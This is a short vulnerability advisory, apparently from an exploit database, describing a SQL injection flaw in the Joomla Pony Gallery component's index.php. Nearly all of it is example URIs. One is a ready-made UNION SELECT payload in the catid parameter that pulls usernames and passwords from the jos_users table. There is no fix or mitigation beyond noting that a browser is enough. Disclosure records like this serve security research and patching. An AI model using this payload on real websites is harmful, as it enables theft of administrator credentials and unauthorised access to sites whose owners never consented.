Joomla Pony Gallery Component Index.PHP SQL Injection Vulnerability

Joomla Pony Gallery Component Index.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL inject]

http://www.example.com/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*[[/SQL]]